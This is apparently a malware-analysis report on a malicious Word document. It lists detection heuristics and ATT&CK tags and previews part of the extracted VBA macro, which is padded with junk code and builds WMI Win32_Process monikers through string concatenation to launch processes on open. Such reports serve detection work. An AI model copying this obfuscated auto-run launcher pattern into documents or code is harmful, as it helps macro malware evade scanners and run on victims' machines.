MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes GetObject and CreateObject to launch the Win32_Process service, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro further suggests an immediate execution upon opening.
Heuristics 8
-
ClamAV: Doc.Malware.Dpzn-6865674-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dpzn-6865674-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 62722 bytes |
SHA-256: 7a112d8fbf6e1620cf09d6c3bfd801b5442c4575490850d0827a95c6f13f0cb5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "u195__"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "E18__15_"
Function j_5_87()
Select Case G1_0_618
Case 447723784
P93889 = Log(Q6_033_)
m0679810 = CDate(785300303)
P4111_ = Fix(126663437 + 514760233 + i_18_645 - Oct(733539026))
O3__9_02 = Cos(100106577 - Sqr(831898273 - Atn(730863810)) - 507807748 + 661269048)
End Select
Select Case P_28349
Case 71880305
P9_0_270 = Log(k__973)
S_935__ = CDate(921852484)
Z3_64755 = Fix(315264843 + 253672570 + p_1__848 - Oct(91764033))
H04324 = Cos(34255452 - Sqr(702842601 - Atn(836122617)) - 234301587 + 608430254)
End Select
Select Case Q4141_21
Case 665495054
P4___51 = Log(C5___15)
O__3475 = CDate(255570150)
W_26748 = Fix(870327825 + 953139016 + u3_2_1 - Oct(287532604))
C765678 = Cos(138167486 - Sqr(10556391 - Atn(304481280)) - 516467797 + 550133244)
End Select
Select Case z1295__
Case 763645484
z06_2_4 = Log(V0_46644)
z2__8_3 = CDate(853531545)
G883504_ = Fix(354637327 + 742854188 + f_4____ - Oct(208669166))
w6381__ = Cos(786123347 - Sqr(976236824 - Atn(962728912)) - 690500935 + 5973924)
End Select
Select Case G_35___
Case 282176963
X4781997 = Log(z91215)
N552__ = CDate(844541035)
j_37660 = Fix(23614483 + 234963654 + K2_653 - Oct(394675726))
F58__128 = Cos(348314512 - Sqr(269808230 - Atn(576973293)) - 722958843 + 65488023)
End Select
Select Case L_71_4_
Case 800972472
z6_944_2 = Log(V_15164_)
z_1_955 = CDate(234530668)
S214_44 = Fix(989167551 + 626384237 + f4816_ - Oct(183959124))
z_87_25 = Cos(974520651 - Sqr(981173403 - Atn(926300898)) - 983335012 + 747925584)
End Select
End Function
Function L_22_1_(t28___75, w88462_)
On Error Resume Next
Select Case Z50985
Case 885926513
h______1 = Log(p04334)
E3656949 = CDate(292195844)
j19_5117 = Fix(188876190 + 68255916 + k74_04 - Oct(134928626))
o5_6458 = Cos(182751109 - Sqr(662572336 - Atn(221893379)) - 570424486 + 841439915)
End Select
Select Case P566_79
Case 524663976
F929_2 = Log(J4_045)
L3_7__3 = CDate(21356895)
N788_137 = Fix(372601622 + 824078040 + S55_4_09 - Oct(90908165))
O370815 = Cos(434503141 - Sqr(92290108 - Atn(652744678)) - 118056175 + 841822409)
End Select
T184__ = Z_7__32 + "winmgmts:Win32" + "_ProcessStartup" + b328365_
Select Case D_17844
Case 436148741
j____3 = Log(P5_467)
F34_82 = CDate(117321797)
Q3_049_ = Fix(604543859 + 658234611 + h47897 - Oct(298424411))
q89_621 = Cos(197054287 - Sqr(464570420 - Atn(610194815)) - 494605964 + 793191674)
End Select
Select Case U5_3270
Case 652297305
u0313828 = Log(J_6_35_8)
p861_96_ = CDate(594990500)
j2_504 = Fix(212096983 + 356631240 + N_058__ - Oct(989957970))
H042543 = Cos(305850197 - Sqr(598050592 - Atn(177921432)) - 104496503 + 941154457)
End Select
Select Case i92__6_1
Case 213498542
v7318_21 = Log(N5_9__)
I445__ = CDate(778477187)
K9__61_9 = Fix(623630271 + 760391658 + J905_54 - Oct(199282081))
d__16898 = Cos(252498051 - Sqr(280539446 - Atn(139200071)) - 113982716 + 938097254)
End Select
f9726__ = t42131 + "winmgmts:Win32" + "_Process" + w981398
Select Case I82388_
Case 962496415
K5__9871 = Log(S_6349_3)
q_8074 = CDate(870961037)
r73500 = Fix(699142838
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.